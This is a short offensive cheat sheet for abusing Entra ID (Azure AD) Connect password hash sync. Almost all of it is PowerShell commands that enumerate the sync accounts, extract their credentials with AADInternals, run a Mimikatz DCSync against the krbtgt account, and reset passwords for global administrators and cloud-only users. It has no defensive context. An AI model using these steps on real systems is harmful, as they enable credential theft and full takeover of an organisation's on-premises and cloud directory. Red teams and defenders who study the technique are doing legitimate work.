Password Hash Sync Abuse

Steps

1) Enumerate Entra ID Installation Server (Run this On-Premises)

Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl

2) Enumerate Entra ID Installation Server (Run this on Azure)

Import-Module .\AzureAD.psd1

Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

3) Extract credentials from the server

Import-Module .\AADInternals.psd1

Get-AADIntSyncCredentials

4) DCSync with MSOL_* account credentials

Connect with MSOL_* account

runas /netonly /user:<DOMAIN>\MSOL_<ID> cmd

DCSync attack

Invoke-Mimikatz -Command '"lsadump::dcsync/user:<DOMAIN>\krbtgt /domain:<DOMAIN> /dc:<DC NAME>"'

Reset Password of any user (Including Global Administrators)

Import-Module .\AADInternals.psd1

$passwd = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force

$creds = New-Object System.Management.Automation.PSCredential ("<SYNCUSERNAME>", $passwd)

Get-AADIntAccessTokenForAADGraph -Credentials $creds -SaveToCache

6) Enumerate Global Admins

Get-AADIntGlobalAdmins

7) Get the ImmutableID

Get-AADIntUser -UserPrincipalName <NAME> | select ImmutableId

8) Reset the Azure password

Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE ID>" -Password "<PASSWORD>" -Verbose

9) Reset password for Cloud-only user

Import-Module .\AADInternals.psd1

Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

Set-AADIntUserPassword -CloudAnchor "<ID>" -Password "<PASSWORD>" -Verbose